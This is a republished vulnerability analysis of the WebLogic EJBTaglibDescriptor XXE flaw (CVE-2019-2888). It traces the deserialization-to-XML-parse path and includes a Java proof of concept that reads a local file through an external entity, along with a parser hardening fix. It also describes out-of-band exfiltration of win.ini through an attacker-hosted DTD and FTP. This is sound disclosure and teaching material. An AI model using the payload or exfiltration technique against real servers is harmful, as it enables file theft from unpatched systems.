Analysis of WebLogic EJBTaglibDescriptor XXE vulnerabilities (CVE-2019-2888)

2025-02-24 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

Author: Longofo@Knownsec 404 Team

Date: October 16, 2019

Original link: https://paper.seebug.org/1067/

This vulnerability is of the same kind as several XXE vulnerabilities that @Matthias Kaiser reported earlier (see [1] for the analysis of those), and EJBTaglibDescriptor appears to be one that was missed. @Badcode and I decompiled all of WebLogic's jar files and searched for classes matching the pattern of those earlier XXEs; EJBTaglibDescriptor is one such class, because it parses XML while being deserialized.

Oracle's October 2019 Critical Patch Update addresses this issue; see the advisory for details (https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html).

Environment

Windows 10
WebLogic 10.3.6.0.190716 (July 2019 patch installed)
jdk160_29 (the JDK bundled with WebLogic)

Vulnerability Analysis

weblogic.jar!\weblogic\servlet\ejb2jsp\dd\EJBTaglibDescriptor.class: this class implements java.io.Externalizable.

Therefore, writeExternal and readExternal are invoked automatically when the object is serialized and deserialized, respectively.

Look at the logic of writeExternal and readExternal.

In readExternal, a String is read from the serialized stream with ObjectInput.readUTF and then passed to the load method.

In load, that string is parsed as XML with DocumentBuilder.parse, so this is a candidate XXE: any external entity the attacker declares in the string will be resolved by the parser.

In writeExternal, the class's own toString method is called, which in turn calls its toXML method.

toXML converts this.beans into the corresponding XML. Building a payload through that path looks tedious, but the serialization side is entirely under the attacker's control, so we can simply rewrite the logic of writeExternal to emit whatever string we want; the server's readExternal will parse it as-is:

Vulnerability Reproduction

1. Rewrite the writeExternal function in EJBTaglibDescriptor so that it writes the XXE payload, and serialize the object.

2. Send the serialized payload to the server.

Our HTTP server receives the request for my.dtd and our FTP server receives the request carrying the contents of win.ini.

3. On the server, which has the July 2019 patch installed, the corresponding error message can also be seen.
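The following stand-alone Java program is an added example, not code from the original post or from WebLogic. Its Descriptor class imitates the flow described above (readExternal reads one UTF string and hands it to load, which calls DocumentBuilder.parse), writeExternal writes an attacker-chosen string exactly as the rewritten EJBTaglibDescriptor does, and a HARDENED switch stands in for a patched parser that refuses DOCTYPE declarations. The class name, the switch, and the temporary file used in place of win.ini are assumptions made for this demo; the entity is read in-band so the program runs offline.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

/*
 * Added example, not WebLogic code. Descriptor imitates the EJBTaglibDescriptor
 * flow: readExternal() reads one UTF string from the stream and hands it to
 * load(), which feeds it to DocumentBuilder.parse(). The class name, the
 * HARDENED switch and the temp file are assumptions made for this demo.
 */
public class DescriptorXxeDemo {

    /** Stand-in for the server's patch level: false = default parser, true = DOCTYPE refused. */
    static boolean HARDENED = false;

    public static class Descriptor implements Externalizable {
        private String xml;
        private String parsedText;

        public Descriptor() { }                          // Externalizable needs a public no-arg constructor
        public Descriptor(String xml) { this.xml = xml; }

        // Attacker side: whatever string is written here is what the server's readExternal()
        // will parse. The post gets the same effect by rewriting WebLogic's own writeExternal().
        @Override
        public void writeExternal(ObjectOutput out) throws IOException {
            out.writeUTF(xml);
        }

        // Server side: the untrusted string goes straight from the stream into the XML parser.
        @Override
        public void readExternal(ObjectInput in) throws IOException {
            load(in.readUTF());
        }

        private void load(String data) throws IOException {
            try {
                DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
                if (HARDENED) {
                    // Fix: refuse any DOCTYPE, so no entity (internal or external) can be declared.
                    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
                    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
                    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
                    dbf.setXIncludeAware(false);
                    dbf.setExpandEntityReferences(false);
                }
                DocumentBuilder db = dbf.newDocumentBuilder();
                Document doc = db.parse(new InputSource(new StringReader(data)));
                parsedText = doc.getDocumentElement().getTextContent();
            } catch (IOException e) {
                throw e;
            } catch (Exception e) {
                throw new IOException("XML parse failed: " + e.getMessage(), e);
            }
        }

        public String getParsedText() { return parsedText; }
    }

    /** Serialize a Descriptor carrying attacker-chosen XML, as the exploit does before sending it over T3. */
    static byte[] serialize(String payloadXml) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new Descriptor(payloadXml));
        }
        return bos.toByteArray();
    }

    /** Deserialize as the server would: readExternal() runs and the XML is parsed immediately. */
    static Descriptor deserialize(byte[] stream) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            return (Descriptor) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed local secret standing in for win.ini; an in-band file entity keeps the demo offline.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "SECRET=42".getBytes(StandardCharsets.UTF_8));

        String payload = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE taglib [<!ENTITY x SYSTEM \"" + secret.toUri() + "\">]>"
                + "<taglib>&x;</taglib>";
        byte[] stream = serialize(payload);

        HARDENED = false;
        System.out.println("default parser: " + deserialize(stream).getParsedText());

        HARDENED = true;
        try {
            deserialize(stream);
            System.out.println("hardened parser: payload parsed (unexpected)");
        } catch (IOException e) {
            System.out.println("hardened parser: " + e.getMessage());
        }
        Files.deleteIfExists(secret);
    }
}
```

Compile and run with `javac DescriptorXxeDemo.java && java DescriptorXxeDemo`: with the default factory the deserialized object's parsed text is the secret file's contents, and with the hardened factory deserialization fails at the DOCTYPE before any entity is resolved. The out-of-band form used in the reproduction above differs only in the XML: the internal subset declares a parameter entity whose SYSTEM identifier is the attacker's hosted my.dtd, and that DTD declares a file entity for win.ini and a second entity whose SYSTEM identifier embeds it in an ftp:// URL, so the data leaves in the request line of the FTP connection even though the parse itself ends in an error on the server.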

Reference links:

[1] Analysis of the earlier WebLogic XXE vulnerabilities: https://paper.seebug.org/906/

[2] Oracle Critical Patch Update Advisory, October 2019: https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

Please indicate the source if you need to reprint.
